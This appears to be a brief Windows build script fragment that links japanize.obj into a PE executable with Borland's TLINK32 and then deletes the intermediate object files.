TLINK32 -x -aa -Tpe japanize.obj,,,%import32.lib
|
|||
|
DEL *.OBJ
|